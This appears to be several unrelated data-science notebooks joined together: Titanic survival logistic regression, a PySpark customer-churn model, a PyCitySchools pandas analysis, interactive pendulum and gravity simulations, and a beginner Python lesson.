```
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
%matplotlib inline
train = pd.read_csv('titanic_train.csv')
test = pd.read_csv('titanic_test.csv')
train.head(5)
train.info()
sns.heatmap(train.isnull(), yticklabels=False, cmap='viridis', cbar=False)
sns.heatmap(test.isnull(), yticklabels=False, cmap='viridis', cbar=False)
sns.countplot(x='Survived', data=train, hue='Sex')
test.columns
# distplot is deprecated in recent seaborn versions; kdeplot draws the same hist=False density curves
sns.kdeplot(train[train['Survived'] == 1]['Age'].dropna(), color='r')
sns.kdeplot(train[train['Survived'] == 0]['Age'].dropna())
sns.kdeplot(train[train['Survived'] == 1]['Fare'], color='r')
sns.kdeplot(train[train['Survived'] == 0]['Fare'])
plt.figure(figsize=(10, 4))
sns.set_style('white', rc={'axes.grid': True})
sns.boxplot(x='Pclass', y='Age', data=train, hue='Sex')
```
You can use `sns.axes_style()` to return the current axes styling and then override individual settings with `set_style()`.
```
# We can read the mean age for each category off the boxplot, but to be precise:
for pclass in [1, 2, 3]:
    for sex in ['male', 'female']:
        print(pclass, sex, round(train[(train['Pclass'] == pclass) & (train['Sex'] == sex)]['Age'].mean(), 2))
```
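For reference, the same per-class, per-sex mean ages can be computed in one pass with `groupby`; a minimal self-contained sketch (the frame below uses the same column names as the Titanic data, but made-up values):

```python
import pandas as pd

# Toy frame with the Titanic column names; the values are invented
toy = pd.DataFrame({
    'Pclass': [1, 1, 2, 2, 3, 3],
    'Sex': ['male', 'female', 'male', 'female', 'male', 'female'],
    'Age': [40.0, 35.0, 31.0, 29.0, 25.0, 22.0],
})

# One groupby replaces the nested for-loops
mean_ages = toy.groupby(['Pclass', 'Sex'])['Age'].mean().round(2)
print(mean_ages)
```

On the real `train` frame, `train.groupby(['Pclass', 'Sex'])['Age'].mean()` prints the same table as the loop above.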
In order to define our impute function, the best approach is a structured lookup object, which avoids a long chain of `if` statements.
```
age_class = {1: {'male': 41.28, 'female': 34.61},
             2: {'male': 30.74, 'female': 28.72},
             3: {'male': 25.51, 'female': 21.70}}

def impute_age(cols):
    Age, Pclass, Sex = tuple(cols)
    if pd.isnull(Age):
        # Look up the mean age for this class/sex (replaces a long if/elif chain)
        return age_class[Pclass][Sex]
    else:
        return Age

train['Age'] = train[['Age', 'Pclass', 'Sex']].apply(impute_age, axis=1)
sns.heatmap(train.isnull(), yticklabels=False, cbar=False, cmap='viridis')
train.drop('Cabin', axis=1, inplace=True)
train.dropna(inplace=True)
train = pd.get_dummies(train, columns=['Sex', 'Embarked'], drop_first=True)
train.head()
train.drop(['PassengerId', 'Name', 'Ticket'], axis=1, inplace=True)
train.head()
```
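As a side note, `get_dummies` with `drop_first=True` keeps k-1 indicator columns per categorical feature to avoid perfect collinearity; a small standalone example:

```python
import pandas as pd

toy = pd.DataFrame({'Sex': ['male', 'female', 'male'],
                    'Embarked': ['S', 'C', 'Q']})
# One dummy column is dropped per feature; the remaining columns still determine the category
encoded = pd.get_dummies(toy, columns=['Sex', 'Embarked'], drop_first=True)
print(encoded.columns.tolist())
```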
We will not use the test dataset here, since it is meant for the Kaggle competition (it has no survival labels). Still, let's take a look at it.
```
sns.heatmap(test.isnull(), yticklabels=False, cbar=False, cmap='viridis')
test['Age'] = test[['Age', 'Pclass', 'Sex']].apply(impute_age, axis=1)
test.drop('Cabin', axis=1, inplace=True)
test.dropna(inplace=True)
```
We need to convert categorical columns to numerical values using dummy variables
```
test = pd.get_dummies(test, columns=['Sex', 'Embarked'], drop_first=True)
test.drop(['PassengerId', 'Name', 'Ticket'], axis=1, inplace=True)
X = train.drop('Survived', axis=1)
y = train['Survived']
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42)
from sklearn.linear_model import LogisticRegression
logreg = LogisticRegression(max_iter=1000)  # raise max_iter so the solver converges
logreg.fit(X_train, y_train)
predictions = logreg.predict(X_test)
from sklearn.metrics import confusion_matrix, classification_report
con_mat = np.array([['TN', 'FP'],
                    ['FN', 'TP']])
pd.DataFrame(data=con_mat, index=['Actual 0', 'Actual 1'], columns=['Predicted 0', 'Predicted 1'])
```
Reading the matrix horizontally lets you calculate recall, while reading it vertically yields precision. The avg/total row corresponds to the overall accuracy.
```
confusion_matrix(y_test, predictions)
print(classification_report(y_test, predictions))
```
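The horizontal/vertical reading described above can be checked by hand; a sketch with an invented confusion matrix:

```python
import numpy as np

# Invented counts: rows are actual (0, 1), columns are predicted (0, 1)
cm = np.array([[50, 10],   # TN, FP
               [ 5, 35]])  # FN, TP
tn, fp, fn, tp = cm.ravel()

recall = tp / (tp + fn)      # across the "actual 1" row
precision = tp / (tp + fp)   # down the "predicted 1" column
accuracy = (tp + tn) / cm.sum()
print(recall, precision, accuracy)
```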
## 4. Training
In this part of the notebook we will train models on the feature-extracted dataset and evaluate how well they predict churn.
### Setup Prerequisite
```
!pip install pyspark
from google.colab import drive
drive.mount('/content/drive')
```
### Import Needed Library, Initialize Spark and Load Dataframe
```
from pyspark.sql import SparkSession
import pyspark.sql.functions as F
import pyspark.sql.types as T
from pyspark.ml.classification import GBTClassifier, RandomForestClassifier
from pyspark.ml.feature import VectorAssembler
from pyspark.ml.evaluation import BinaryClassificationEvaluator
from pyspark.ml import Pipeline
from pyspark.ml.tuning import TrainValidationSplit, ParamGridBuilder
from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score, roc_auc_score, confusion_matrix
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
spark = SparkSession.builder.appName('sparkify-train').getOrCreate()
# load data and change is_churn column into label column
isOnColab = True # CHANGE THIS VARIABLE IF RUNNING ON DATAPROC
path = '/content/drive/MyDrive/datasets/dsnd-sparkify/ml_df.parquet' if isOnColab else 'gs://udacity-dsnd/ml_df.parquet'
df = spark.read.parquet(path)
df = df.withColumn('label', F.when(F.col("is_churn"), 1).otherwise(0))
df.show(5)
```
### Vectorize Feature and Do Train Test Split
```
# features columns
feature_cols = df.columns[3:-1]
assembler = VectorAssembler(inputCols=feature_cols, outputCol="features")
df = assembler.transform(df)
# take only features and label column
df = df.select(["features", "label"])
train_df, test_df = df.randomSplit([0.9,0.1], seed=42)
print("train")
train_df.groupby("label").count().show()
print("test")
test_df.groupby("label").count().show()
```
We have roughly a 1:2 ratio between the 1 and 0 labels in both datasets, which shows the train and test splits are similarly balanced.
### Build Grid Search, Train Model and Predict Test Data
In this case we will use the gradient-boosted tree (GBT) algorithm to predict churn. I use GBT because it has good accuracy while still giving us reasonable explainability. For hyperparameter tuning, I tune the tree depth and the number of trees, then choose the best model with PySpark's built-in BinaryClassificationEvaluator using the areaUnderROC metric.
```
train_df.printSchema()
# ML algorithm
gbt = GBTClassifier() # GBT algorithm
rf = RandomForestClassifier() # RF algorithm
# Grid search parameter
gbt_grid = ParamGridBuilder() \
    .addGrid(gbt.maxDepth, [5, 6, 7]) \
    .addGrid(gbt.maxIter, [15, 20, 25]) \
    .build()
rf_grid = ParamGridBuilder() \
    .addGrid(rf.maxDepth, [5, 6, 7]) \
    .addGrid(rf.numTrees, [15, 20, 25]) \
    .build()
# train validation split to search through all grid
gbt_tvs = TrainValidationSplit(estimator=gbt,
                               estimatorParamMaps=gbt_grid,
                               evaluator=BinaryClassificationEvaluator(),
                               trainRatio=0.75,
                               seed=42)
rf_tvs = TrainValidationSplit(estimator=rf,
                              estimatorParamMaps=rf_grid,
                              evaluator=BinaryClassificationEvaluator(),
                              trainRatio=0.75,
                              seed=42)
# train model
gbt_model = gbt_tvs.fit(train_df)
rf_model = rf_tvs.fit(train_df)
gbt_model.bestModel
rf_model.bestModel
```
From the result above, the best GBT model uses 25 trees and a tree depth of 7.
```
gbt_model.bestModel.featureImportances
```
As seen above, the most important features in the gradient-boosted model are number 1 (subscription duration) with value 0.2645, number 2 (songs heard per day of subscription) with 0.1197, number 7 (session count) with 0.087, and number 15 (cancel-confirmation page visits) with 0.109.
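To make the importance vector easier to read, each index can be paired with its column name and sorted; a minimal sketch (the feature names and values below are illustrative, not the actual model output):

```python
# Hypothetical feature names and importances, for illustration only
feature_cols = ['days_active', 'subscription_days', 'songs_per_day',
                'sessions', 'cancel_page_visits']
importances = [0.05, 0.2645, 0.1197, 0.087, 0.109]

# Pair importances with names and sort, largest first
ranked = sorted(zip(importances, feature_cols), reverse=True)
for score, name in ranked:
    print(f'{name}: {score:.4f}')
```

In the notebook itself, the real names would come from the `feature_cols` list built before the `VectorAssembler` step.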
### Evaluate model
Before evaluating the predictions, I create a helper function to ease evaluation later on.
```
def evaluate(df, label_col='label', pred_col='prediction'):
    '''
    INPUT:
    df - spark dataframe
    label_col - name of label column
    pred_col - name of prediction column
    OUTPUT:
    res - pandas dataframe of metrics
    '''
    temp_df = df.select([label_col, pred_col]).toPandas()
    return pd.DataFrame.from_dict({
        "accuracy": [accuracy_score(temp_df[label_col], temp_df[pred_col])],
        "precision": [precision_score(temp_df[label_col], temp_df[pred_col])],
        "recall": [recall_score(temp_df[label_col], temp_df[pred_col])],
        "f1": [f1_score(temp_df[label_col], temp_df[pred_col])],
        "roc_auc": [roc_auc_score(temp_df[label_col], temp_df[pred_col])],
    })
# predict on test dataframe
preds_gbt_df = gbt_model.transform(test_df)
preds_rf_df = rf_model.transform(test_df)
# metrics result
evaluate(preds_gbt_df)
evaluate(preds_rf_df)
# confusion matrix
c_mat_gbt = confusion_matrix(preds_gbt_df.select("label").toPandas(),
                             preds_gbt_df.select("prediction").toPandas())
c_mat_rf = confusion_matrix(preds_rf_df.select("label").toPandas(),
                            preds_rf_df.select("prediction").toPandas())
fig, axes = plt.subplots(1,2, figsize=(15,5))
sns.heatmap(c_mat_gbt, annot=True, fmt="d", cmap="YlGnBu", ax=axes[0])
sns.heatmap(c_mat_rf, annot=True, fmt="d", cmap="YlGnBu", ax=axes[1])
axes[0].title.set_text("GBT Model")
axes[1].title.set_text("RF Model")
```
With the metrics shown above, we get good F1 and ROC AUC scores. But as you can see in the confusion matrix, the accuracy is mostly driven by the high true-negative count. We care more about true positives, since those are the users we can stop from churning. To see how well the model predicts churn specifically, we can compute recall (312 / (312 + 168)) and get 65%.
### Train Model with Weighted Dataset
Since we are more concerned with increasing the true-positive count, I will retrain the model on a weighted dataset: negative labels get a weight of 0.7 and positive labels a weight of 1.
```
# add weight column
train_df_w = train_df.withColumn("weight", F.when(F.col("label") == 1, 1).otherwise(0.7))
train_df_w.show(5)
```
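The 0.7 weight here is a manual choice; a common alternative is to derive the weight from the class ratio so that both classes contribute equal total weight. A pure-Python sketch with invented counts (roughly the 1:2 ratio observed earlier):

```python
# Invented label counts, roughly matching the 1:2 ratio seen earlier
n_pos, n_neg = 500, 1000

# Weight negatives down so total positive weight equals total negative weight
pos_weight = 1.0
neg_weight = n_pos / n_neg
print(neg_weight)
```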
I use the same models, grids and validation method as before, but we need to specify the weight column name so it is used during training.
```
# gradient boosted tree algorithm
gbt_w = GBTClassifier().setWeightCol("weight")
rf_w = RandomForestClassifier(weightCol="weight")
# train validation split to search through all grid
gbt_tvs_w = TrainValidationSplit(estimator=gbt_w,
                                 estimatorParamMaps=gbt_grid,
                                 evaluator=BinaryClassificationEvaluator().setWeightCol("weight"),
                                 trainRatio=0.75,
                                 seed=42)
rf_tvs_w = TrainValidationSplit(estimator=rf_w,
                                estimatorParamMaps=rf_grid,
                                evaluator=BinaryClassificationEvaluator().setWeightCol("weight"),
                                trainRatio=0.75,
                                seed=42)
# train model with weighted dataset
gbt_model_w = gbt_tvs_w.fit(train_df_w)
rf_model_w = rf_tvs_w.fit(train_df_w)
gbt_model_w.bestModel
```
After training, the best model uses 20 trees and a tree depth of 7.
```
gbt_model_w.bestModel.featureImportances
```
As seen above, the most influential features are subscription duration, songs played per day, session count and the number of cancel-confirmation page visits: the same as in the previous model, but with different values.
### Evaluate Weighted Model
```
# predict using weighted model
preds_gbt_w_df = gbt_model_w.transform(test_df)
preds_rf_w_df = rf_model_w.transform(test_df)
evaluate(preds_gbt_w_df)
evaluate(preds_rf_w_df)
# confusion matrix
c_mat_gbt_w = confusion_matrix(preds_gbt_w_df.select("label").toPandas(),
                               preds_gbt_w_df.select("prediction").toPandas())
c_mat_rf_w = confusion_matrix(preds_rf_w_df.select("label").toPandas(),
                              preds_rf_w_df.select("prediction").toPandas())
fig, axes = plt.subplots(1,2, figsize=(15,5))
sns.heatmap(c_mat_gbt_w, annot=True, fmt="d", cmap="YlGnBu", ax=axes[0])
sns.heatmap(c_mat_rf_w, annot=True, fmt="d", cmap="YlGnBu", ax=axes[1])
axes[0].title.set_text("GBT Weighted Model")
axes[1].title.set_text("RF Weighted Model")
```
As seen above, all the metrics improve, especially the recall score. On the downside, the number of true negatives is reduced.
# PyCitySchools Solution
* Submitted by: Farshad Esnaashari
* Data Analytics Bootcamp
* M-W session
```
# Dependencies and Setup
import pandas as pd
# File to Load (Remember to Change These)
school_data_to_load = "Resources/schools_complete.csv"
student_data_to_load = "Resources/students_complete.csv"
# Read School and Student Data File and store into Pandas Data Frames
school_data = pd.read_csv(school_data_to_load)
student_data = pd.read_csv(student_data_to_load)
# Combine the data into a single dataset
school_data_complete = pd.merge(student_data, school_data, how="left", on="school_name")
```
## District Summary
* Calculate the total number of schools
* Calculate the total number of students
* Calculate the total budget
* Calculate the average math score
* Calculate the average reading score
* Calculate the overall passing rate (overall average score), i.e. (avg. math score + avg. reading score)/2
* Calculate the percentage of students with a passing math score (70 or greater)
* Calculate the percentage of students with a passing reading score (70 or greater)
* Create a dataframe to hold the above results
* Optional: give the displayed data cleaner formatting
```
# Calculate the total number of schools in school_data
total_schools = school_data["school_name"].count()
# Calculate the total number of students (use the size column) in school_data
total_students = school_data["size"].sum()
# Calculate the total budget (use the budget column in school_data)
total_budget = school_data["budget"].sum()
# Calculate the average math score in student_data
average_math_score = student_data["math_score"].mean()
# Calculate the average reading score in student_data
average_reading_score = student_data["reading_score"].mean()
# Use the loc function to create a subset a dataframe with students passing math
students_passing_math = student_data.loc[student_data["math_score"] >= 70]
# Calculate percent passing math
pct_passing_math = 100*students_passing_math["student_name"].count()/total_students
#Use the loc function to create a dataframe with students passing reading
students_passing_reading = student_data.loc[student_data["reading_score"] >= 70]
# calculate percent passing reading
pct_passing_reading = 100 * students_passing_reading["student_name"].count() / total_students
# put the results in a data frame called district_summary
district_summary=pd.DataFrame({"Total Schools":[total_schools],
"Total Students": [total_students],
"Total Budget": [total_budget],
"Average Math Score": [average_math_score],
"Average Reading Score": [average_reading_score],
"% Passing Math": [pct_passing_math],
"% Passing Reading": [pct_passing_reading],
"% Overall Passing Rate": [(average_math_score+average_reading_score)/2]})
# Use map to format the Total Students and Total Budget columns
district_summary["Total Students"]=district_summary["Total Students"].map("{:,}".format)
district_summary["Total Budget"]=district_summary["Total Budget"].map("${:,.2f}".format)
#display the dataframe
district_summary.head()
```
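One caveat worth remembering: `map` with a format string replaces the numeric values with strings, so any arithmetic on those columns must happen before formatting. A small demonstration:

```python
import pandas as pd

df = pd.DataFrame({'Total Budget': [24649428]})
df['Total Budget'] = df['Total Budget'].map('${:,.2f}'.format)
print(df.loc[0, 'Total Budget'])  # now a string, not a number
```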
## School Summary
* Create an overview table that summarizes key metrics about each school, including:
* School Name
* School Type
* Total Students
* Total School Budget
* Per Student Budget
* Average Math Score
* Average Reading Score
* % Passing Math
* % Passing Reading
* Overall Passing Rate (Average of the above two)
* Create a dataframe to hold the above results
```
# Note: I used the new groupby named-aggregation (relabeling) syntax that is already
# available in my current PythonData installation.
# To create the school summary, I create dataframes in 4 steps:
#step 1: create school_df_1 for average math and reading scores
school_df_1 = school_data_complete.groupby('school_name').agg(
    total_students=('student_name', 'count'),
    avg_math_score=('math_score', 'mean'),
    avg_reading_score=('reading_score', 'mean'))
# Step 2.a: create a dataframe to hold students with passing math scores (>=70)
passing_math_df= school_data_complete.loc[school_data_complete['math_score'] >=70]
# Step 2.b: group the passing-math dataframe by school_name and count the rows
school_df_2 = passing_math_df.groupby('school_name').agg(
    total_passing_math=('student_name', 'count'))
#step 3.a: create a dataframe to hold students with passing reading scores (>=70)
passing_reading_df= school_data_complete.loc[school_data_complete['reading_score'] >=70]
#step 3.b: group passing reading dataframe by school_name and count the rows
school_df_3 = passing_reading_df.groupby('school_name').agg(
    total_passing_reading=('student_name', 'count'))
# Step 4: create a dataframe from the school_data with subset of school_name, type, budget, and size
school_df_4 = school_data.loc[:,['school_name','type','budget', 'size']]
# merge the previous 4 dataframes (school_df_1 to school_df_4) into a school_summary dataframe
school_summary = pd.merge(school_df_1, school_df_2, on='school_name')
school_summary = pd.merge(school_summary, school_df_3, on='school_name')
school_summary = pd.merge(school_summary, school_df_4, on='school_name')
# Calculate percent passing math into a new column
school_summary["pct_passing_math"]= 100*school_summary["total_passing_math"]/school_summary["total_students"]
# Calculate percent passing reading into a new column
school_summary['pct_passing_reading'] = 100*school_summary["total_passing_reading"]/school_summary["total_students"]
# create a new column for percent overall passing rate
school_summary['overall_passing_rate'] = (school_summary['pct_passing_math']+ \
school_summary['pct_passing_reading'])/2
# create a new column for per student budget
school_summary['per_student_budget'] = school_summary['budget']/school_summary['size']
# Reorganize the columns using a list
school_summary = school_summary[['school_name','type', 'total_students',
'budget', 'per_student_budget',
'avg_math_score', 'avg_reading_score',
'pct_passing_math', 'pct_passing_reading',
'overall_passing_rate']]
# Rename the columns
school_summary = school_summary.rename(columns={"type":"School Type",
"total_students": "Total Students",
"budget": "Total School Budget",
"per_student_budget": "Per Student Budget",
"avg_math_score": "Average Math Score",
"avg_reading_score": "Average Reading Score",
"pct_passing_math": "% Passing Math",
"pct_passing_reading": "% Passing Reading",
"overall_passing_rate": "% Overall Passing Rate"})
#Format columns for Total School Budget, Per Student Budget using the map function
school_summary["Total School Budget"] = school_summary["Total School Budget"].map("${:,.2f}".format)
school_summary["Per Student Budget"] = school_summary["Per Student Budget"].map("${:,.2f}".format)
# school_summary = school_summary.set_index("school_name")
```
## Top Performing Schools (By Passing Rate)
* Sort and display the top five schools in overall passing rate
```
# sort the school_summary dataframe on % Overall Passing Rate in descending order
top_5_schools = school_summary.sort_values("% Overall Passing Rate", ascending=False)
top_5_schools.set_index("school_name",inplace=True)
top_5_schools.head()
```
## Bottom Performing Schools (By Passing Rate)
* Sort and display the five worst-performing schools
```
# sort the school_summary dataframe on overall_passing_rate in ascending order
bottom_5_schools = school_summary.sort_values("% Overall Passing Rate")
bottom_5_schools.set_index("school_name", inplace=True)
bottom_5_schools.head()
```
## Math Scores by Grade
* Create a table that lists the average math score for students of each grade level (9th, 10th, 11th, 12th) at each school.
* Create a pandas series for each grade. Hint: use a conditional statement.
* Group each series by school
* Combine the series into a dataframe
* Optional: give the displayed data cleaner formatting
```
# Use the loc function with conditional filtering to build 4 dataframes for grades 9 to 12 average math scores
nine_grade = school_data_complete.loc[school_data_complete["grade"] =="9th"].rename(columns={"math_score": "9th"})
ten_grade = school_data_complete.loc[school_data_complete["grade"] =="10th"].rename(columns={"math_score": "10th"})
eleven_grade = school_data_complete.loc[school_data_complete["grade"] =="11th"].rename(columns={"math_score": "11th"})
twelve_grade = school_data_complete.loc[school_data_complete["grade"] =="12th"].rename(columns={"math_score": "12th"})
# calculate the average math score for each frame, grouped by school_name
avg_9_grades = nine_grade.groupby('school_name').agg({'9th':'mean'})
avg_10_grades = ten_grade.groupby('school_name').agg({'10th':'mean'})
avg_11_grades = eleven_grade.groupby('school_name').agg({'11th':'mean'})
avg_12_grades = twelve_grade.groupby('school_name').agg({'12th': 'mean'})
#merge the 4 dataframes into math_scores_by_grade
math_scores_by_grade = pd.merge(avg_9_grades, avg_10_grades, on="school_name")
math_scores_by_grade = pd.merge(math_scores_by_grade, avg_11_grades, on="school_name")
math_scores_by_grade = pd.merge(math_scores_by_grade, avg_12_grades, on="school_name")
math_scores_by_grade
```
## Reading Score by Grade
* Perform the same operations as above for reading scores
```
# build 4 dataframes for average scores in grades 9 to 12
nine_grade = school_data_complete.loc[school_data_complete["grade"] =="9th"].rename(columns={"reading_score": "9th"})
ten_grade = school_data_complete.loc[school_data_complete["grade"] =="10th"].rename(columns={"reading_score": "10th"})
eleven_grade = school_data_complete.loc[school_data_complete["grade"] =="11th"].rename(columns={"reading_score": "11th"})
twelve_grade = school_data_complete.loc[school_data_complete["grade"] =="12th"].rename(columns={"reading_score": "12th"})
# group by school_name and calculate the reading score average for each grade
avg_9_grades = nine_grade.groupby('school_name').agg({'9th':'mean'})
avg_10_grades = ten_grade.groupby('school_name').agg({'10th':'mean'})
avg_11_grades = eleven_grade.groupby('school_name').agg({'11th':'mean'})
avg_12_grades = twelve_grade.groupby('school_name').agg({'12th':'mean'})
# merge the 4 dataframes into reading_scores_by_grade
reading_scores_by_grade = pd.merge(avg_9_grades, avg_10_grades, on="school_name")
reading_scores_by_grade = pd.merge(reading_scores_by_grade, avg_11_grades, on="school_name")
reading_scores_by_grade = pd.merge(reading_scores_by_grade, avg_12_grades, on="school_name")
reading_scores_by_grade
```
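The four-merge pattern above works, but `pivot_table` builds the same school-by-grade grid in one call; a self-contained sketch on toy data:

```python
import pandas as pd

toy = pd.DataFrame({
    'school_name': ['A', 'A', 'A', 'B', 'B', 'B'],
    'grade': ['9th', '10th', '9th', '9th', '10th', '10th'],
    'reading_score': [80, 85, 90, 70, 75, 95],
})
by_grade = toy.pivot_table(index='school_name', columns='grade',
                           values='reading_score', aggfunc='mean')
# Reorder the columns so the grades read in school order
by_grade = by_grade[['9th', '10th']]
print(by_grade)
```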
## Scores by School Spending
* Create a table that breaks down school performances based on average Spending Ranges (Per Student). Use 4 reasonable bins to group school spending. Include in the table each of the following:
* Average Math Score
* Average Reading Score
* % Passing Math
* % Passing Reading
* Overall Passing Rate (Average of the above two)
```
# Set bins and group names for ranges of per student spending
spending_bins = [0, 585, 615, 645, 675]
group_names = ["<$585", "$585-615", "$615-645", "$645-675"]
# create dataframe with subset of columns from the school summary using the loc function
summary_by_spending=school_summary.loc[:,["Per Student Budget", "Average Math Score",
"Average Reading Score", "% Passing Math",
"% Passing Reading", "% Overall Passing Rate" ]]
# cast Per Student Budget (a $-formatted string) back into a float
summary_by_spending["Per Student Budget"]= summary_by_spending["Per Student Budget"].str.slice(start=1).astype(float)
# bin the spending per student
summary_by_spending["Spending Ranges (Per Student)"]= pd.cut(summary_by_spending["Per Student Budget"],
spending_bins, labels=group_names)
# group data by the bins
summary_by_spending = summary_by_spending.groupby("Spending Ranges (Per Student)").agg(
{'Average Math Score': 'mean',
'Average Reading Score': 'mean',
'% Passing Math':'mean',
'% Passing Reading': 'mean',
'% Overall Passing Rate': 'mean'})
summary_by_spending
```
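For reference, `pd.cut` assigns each value to a right-inclusive interval between consecutive bin edges; a toy example with the same bins:

```python
import pandas as pd

spending = pd.Series([580.0, 600.0, 630.0, 650.0])
spending_bins = [0, 585, 615, 645, 675]
group_names = ["<$585", "$585-615", "$615-645", "$645-675"]
ranges = pd.cut(spending, spending_bins, labels=group_names)
print(ranges.tolist())
```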
## Scores by School Size
* Perform the same operations as above, based on school size.
```
# create lists for size ranges and group_names
size_bins = [0, 1000, 2000, 5000]
group_names = ["Small (<1000)", "Medium (1000-2000)", "Large (2000-5000)"]
# create a subset dataframe from the school summary
summary_by_size=school_summary.loc[:,["Total Students", "Average Math Score",
"Average Reading Score", "% Passing Math",
"% Passing Reading", "% Overall Passing Rate" ]]
# bin the school student sizes in the dataframe
summary_by_size["School Size"]= pd.cut(summary_by_size["Total Students"],
size_bins, labels=group_names)
# group by the school size
summary_by_size = summary_by_size.groupby("School Size").agg(
{'Average Math Score': 'mean',
'Average Reading Score': 'mean',
'% Passing Math': 'mean',
'% Passing Reading': 'mean',
'% Overall Passing Rate': 'mean'})
summary_by_size
```
## Scores by School Type
* Perform the same operations as above, based on school type.
```
# create a dataframe with subset of columns from the school summary
summary_by_type=school_summary.loc[:,["School Type", "Average Math Score",
"Average Reading Score", "% Passing Math",
"% Passing Reading", "% Overall Passing Rate" ]]
# group by school type and compute the statistics using the agg function
summary_by_type = summary_by_type.groupby("School Type").agg(
{'Average Math Score':'mean',
'Average Reading Score': 'mean',
'% Passing Math': 'mean',
'% Passing Reading': 'mean',
'% Overall Passing Rate': 'mean'})
summary_by_type
```
```
import numpy as np
import matplotlib.pyplot as plt
from ipywidgets import interact, fixed
import ipywidgets as widgets
```
Simulate a mathematical pendulum by numerically solving the differential equation that describes it (including large deflections).
$$
\frac{d^2x}{dt^2} + \frac{g}{l} \sin(x) = 0
$$
```
g = 9.81
l = 1
def pendulum(initial_theta, time, initial_omega=0, time_step=0.01, g=g, l=l):
    theta = initial_theta
    omega = initial_omega
    t = 0
    while t < time:
        a = -(g / l) * np.sin(theta)
        omega += a * time_step
        theta += omega * time_step + a * (time_step ** 2) / 2
        t += time_step
    return theta
omega = 1 / np.sqrt(l /g) # = 2*Pi / T (where T = 2*Pi sqrt(l/g))
step = 0.001
T = np.arange(0,30,0.1)
Theta = np.array([pendulum(np.pi / 16, t, time_step=step) for t in T])
actual_theta = np.cos(omega * T)
plt.plot(T, Theta)
plt.plot(T, actual_theta)
plt.show()
def demonstrate_pendulum(initial_theta, time, initial_omega=0, time_step_magn=-2, g=9.8, l=1):
    time_step = 10 ** time_step_magn
    theta = pendulum(initial_theta, time, initial_omega, time_step, g, l)  # pass l through as well
    x = np.sin(theta)
    y = -np.sqrt(l**2 - x**2)
    line_x = np.linspace(x, 0)
    line_y = np.linspace(y, 0)
    plt.scatter(x, y)
    plt.plot(line_x, line_y, color='black')
    plt.scatter([0], [0])
    plt.axis((-1, 1, -2, 0.5))
    plt.show()
interact(demonstrate_pendulum,
time=widgets.FloatSlider(min=0, max=1000, value=0, step=0.01),
initial_theta=widgets.FloatSlider(min=0, max=2*np.pi, value=np.pi/4, step=0.01),
time_step_magn=widgets.IntSlider(min=-5, max=5, value=-2)
)
```
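The update scheme above can be sanity-checked against the small-angle analytic period T = 2π√(l/g): after one full period, a small deflection should come back close to its initial value. A standalone sketch (same scheme, assuming g = 9.81 and l = 1):

```python
import numpy as np

def simulate(theta0, t_end, dt=0.001, g=9.81, l=1.0):
    # Same update scheme as the pendulum() function above
    theta, omega, t = theta0, 0.0, 0.0
    while t < t_end:
        a = -(g / l) * np.sin(theta)
        omega += a * dt
        theta += omega * dt + a * dt**2 / 2
        t += dt
    return theta

theta0 = 0.1  # small angle, so the motion is nearly harmonic
T = 2 * np.pi * np.sqrt(1.0 / 9.81)  # analytic small-angle period
theta_after_period = simulate(theta0, T)
print(theta_after_period)
```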
Simulate a gravitational system: a star and an incoming celestial body with a user-specified initial velocity.
$$
g = G\frac{M}{r^2}
$$
```
@np.vectorize
def g(r, G=1, M=1, r_max=1):
    # Softened gravity: inside r_max the field grows linearly instead of diverging
    return (G * M) / r**2 if r > r_max else ((G * M) / r_max**2) * (r / r_max)

def gravity(time, initial_pos, M=0, initial_v=0, time_step=0.1, r_max=1):
    t = 0
    x = initial_pos
    v = initial_v
    r = np.abs(x)
    a = -g(r, M=M, r_max=r_max) * (x / r)
    X = [x]
    while t < time:
        r = np.abs(x)
        a = -g(r, M=M, r_max=r_max) * (x / r)
        v += a * time_step
        x += v * time_step + a * ((time_step ** 2) / 2)
        t += time_step
        X.append(x)
    return np.array(X), v, a
def demonstrate_gravity(time, in_x, in_y, in_vx, in_vy, time_step_magn, M, r_max):
    # Represent the 2D position and velocity as complex numbers
    pos = in_x + in_y * 1j
    v = in_vx + in_vy * 1j
    time_step = 10 ** time_step_magn
    pos, v, a = gravity(time, pos, initial_v=v, time_step=time_step, M=M, r_max=r_max)
    X = np.real(pos)
    Y = np.imag(pos)
    x = X[-1]
    y = Y[-1]
    line_x = np.linspace(x, 0)
    line_y = np.linspace(y, 0)
    v_x = np.real(v)
    v_y = np.imag(v)
    line_v_x = np.linspace(x, x + v_x)
    line_v_y = np.linspace(y, y + v_y)
    a_x = np.real(a)
    a_y = np.imag(a)
    line_a_x = np.linspace(x, x + a_x)
    line_a_y = np.linspace(y, y + a_y)
    print(x, y)
    print(v)
    print(a)
    ax = plt.gca()
    ax.add_patch(plt.Circle((0, 0), r_max, color='r', fill=False))
    plt.scatter([0], [0], color='red')
    plt.scatter(x, y, color='blue')
    plt.plot(X, Y, color='blue')
    plt.plot(line_v_x, line_v_y, color='green')
    plt.scatter([x + v_x], [y + v_y], color='green', marker='^')
    plt.plot(line_a_x, line_a_y, color='purple')
    plt.scatter([x + a_x], [y + a_y], color='purple', marker='^')
    plt.axis((-5, 5, -5, 5))
    plt.show()
interact(demonstrate_gravity,
time=widgets.FloatSlider(min=0, max=1000, value=0, step=0.1),
time_step_magn=widgets.IntSlider(min=-5, max=5, value=-3),
in_x=widgets.FloatSlider(min=-5, max=5, value=2, step=0.1),
in_y=widgets.FloatSlider(min=-5, max=5, value=2, step=0.1),
in_vx=widgets.FloatSlider(min=-5, max=5, value=-0.5, step=0.1),
in_vy=widgets.FloatSlider(min=-5, max=5, value=0.5, step=0.1),
M=widgets.FloatSlider(min=0, max=10, value=1, step=0.1),
r_max=widgets.FloatSlider(min=0, max=2, value=1, step=0.1)
)
plt.Circle((0,0), 1, color='r')
plt.show()
```
# Basic Programming
- Please use an English input method when typing code
```
print('joker is bad man')
```
## Writing a simple program
- Circle area formula: area = radius \* radius \* 3.1415
### In Python you do not need to declare data types
```
radius = 100  # define a variable
area = radius * radius * 3.14  # ordinary statement; * means multiplication
print(area)  # finally, print the result
```
## Reading input from the console
- `input` reads everything as a string
- `eval` evaluates a string as an expression
- In Jupyter, Shift + Tab pops up the documentation
```
variable = input('Please enter a number')
print(variable)
```
## Variable naming rules
- Composed of letters, digits and underscores
- Must not start with a digit \*
- Identifiers must not be keywords (this can actually be forced, but it is extremely bad practice for code style)
- May be of any length
- Use camelCase naming
```
print(12)
import os
